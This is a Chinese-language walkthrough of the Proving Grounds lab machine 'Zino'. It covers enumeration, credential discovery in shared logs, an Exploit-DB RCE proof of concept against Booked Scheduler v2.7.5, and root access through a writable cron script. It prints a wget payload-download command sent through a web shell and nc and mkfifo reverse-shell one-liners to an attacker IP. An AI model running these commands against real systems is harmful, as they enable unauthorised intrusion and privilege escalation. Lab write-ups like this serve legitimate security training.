Proving Grounds Practice : Zino Walkthrough
Proving Grounds Practice : Zino Walkthrough
Foothole (立足點 ) :
- 8003 發現 CMS : Booked Scheduler v2.7.5
- 直接使用 PoC 成功拿到 shell
PE ( 提權 ) :
- 利用 PoC 的 URL 下指令另外建立 Reverse Shell
- /etc/crontab root 跑一個 pythone 檔案,現有使用者可以修改內容
- 直接用 nc 建立 Reverse Shell
注意事項 :
- 學習 Booked Scheduler
- rm 建立 reverse shell 沒成功後來改直接用 nc 成功
Rustscan,└─$ rustscan -a 192.168.186.64 --scripts none --ulimit 5000 | tee rustscan
snmp filtered,└─$ sudo nmap -sU -p 161 192.168.186.64 | tee snmp
FTP 測試 anonymous、ftp:ftp、admin:admin 登入皆失敗
MySQL root 測試登入,IP 被拒絕
└─$ enum4linux -a 192.168.186.64
有個資料夾 zino,備註顯示 Logs
檔案抓回來看一下 access.log
/booked/Web
auth.log
使用者名稱 peter,passwd:chauthtok
local.txt 就這樣拿到了
獲得另外一怎帳號密碼 admin:adminadmin
hydra FTP 沒有有效的帳號密碼
hydra SSH 一樣沒有有效的帳號密碼
SMB 測試也沒有發現
8003 /
8003 顯示 Booked Scheduler v2.7.5 CMS
查詢 Exploit-DB
第一個是 RCE 且 Authenticated 就先試試看,└─$ searchsploit -m 50594
看一下內容剛好就是 v2.7.5
改一下帳號密碼
這裡有 usage,自作聰明去改了帳號密碼,先將他改回來用 usage 跑跑看
└─$ ./50594.py http://192.168.155.64:8003 admin adminadmin
跑了一堆 reverse shell 要建立另外一個 session 都失敗
透過 PoC 內容下 cmd
└─$ curl http://192.168.155.64:8003/booked/Web/custom-favicon.php?cmd=wget%20http%3A%2F%2F192.168.45.202%3A8003%2Fpg%2F64%2Fphp-reverse-shell.php
存取 Reverse Shell PHP,http://192.168.155.64:8003/booked/Web/php-reverse-shell2.php
拿到新的 shell 了
再建立了一個 445 Reverse Shell,開始 PE
cat /etc/passwd
使用者帳號 peter
su peter 失敗
cat /etc/crontab,有個 root 執行的 ptyhon,/var/www/html/booked/cleanup.py
內容如下,重點是現有使用者有權限可以 write
看起來每三分鐘會跑一次
建立另外一個 cleanup.py 來取代,內容直接改 rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.202 445 >/tmp/f
上傳到靶機,然後取代該檔案
445 等了一段時間都沒有進來,將 python 內容改如下
nc -nv 192.168.45.202 445 -e /bin/bash
這一次進來了,whoami & id 確認是管理者
留言
張貼留言